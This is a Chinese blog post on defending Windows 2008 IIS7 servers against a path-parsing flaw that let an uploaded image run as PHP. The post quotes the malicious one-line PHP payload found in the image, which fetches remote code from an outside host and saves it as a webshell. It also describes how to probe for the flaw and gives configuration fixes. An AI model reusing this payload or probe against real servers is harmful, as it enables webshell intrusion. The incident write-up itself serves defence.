Windows2008 IIS7/IIS7.5解析漏洞解决方法(图片木马解决方法)

时间:2020年08月20日 22:52:14作者:鸿翼分类:好文分享

云服务器优惠

一个朋友的服务器操作系统是Windows2008,Web服务器是IIS7突然收到短信提醒服务器出现了紧急安全事件:发现后门(Webshell)。

Windows2008 IIS7/IIS7.5解析漏洞解决方法

事出突然必有妖,于是立即登陆朋友的服务器查看,发现一个可疑的jpg图片和一个可疑的css.php文件。将图片文件和这个php文件下载到本地用记事本打开,果然图片里包含一段php代码:

??php $save=file_get_contents("http://0xx.pw/php/o.txt");  file_put_contents ("css.php",$save) ?>

恶意图片
生成的css.php刚好和可以的php文件名称对应,所以这是一个利用上传文件功能上传了图片木马,然后利用iis7的解析漏洞生成的php文件。

快速发现服务器存在iis7解析漏洞的方法:

网站任意图片地址后加 ./asp或./aspx或./php或./jsp ,若出现编译错误,则漏洞存在。
例如:如果在浏览器里输入http://您的域名/./php(根据您网站使用的语言而定asp或php等),如果出现“500 - 内部服务器错误,您查找的资源存在问题,因而无法访问。”,那么就存在这个漏洞,需要立即修改。

500内部服务器错误

修复此漏洞的方法:

1、php.ini里cgi.fix_pathinfo=1(默认为1)改成cgi.fix_pathinfo=0

2、将服务器里的IIS管理器中对应的网站打开,选择处理程序映射,在对应php版本上点右键选择编辑,在编辑模块映射里点击请求限制,将仅请求映射至以下内容时才调用处理程序(I):勾选上,然后选择文件或文件夹(O)后点击确定

处理程序映射

编辑模块映射

再去测试(如果在浏览器里输入http://您的域名/./php)时会发现,出现的是404错误,此时,修复完成。

附另外一种修复方法:去D盾官方网站http://www.d99net.net上去下载一个D盾安装到服务器上,安装后测试访问会被拦截。

来源:(QQ/微信:342269231)

注意:购买「阿里云服务器89元起」2020年特惠活动,可以领取阿里云2000元代金券,符合条件的订单可以优先使用代金券抵扣。

云服务器

相关文章

Copyright © 2020 鸿翼小站 All Rights Reserved. 站点地图
鄂ICP备11004285号-2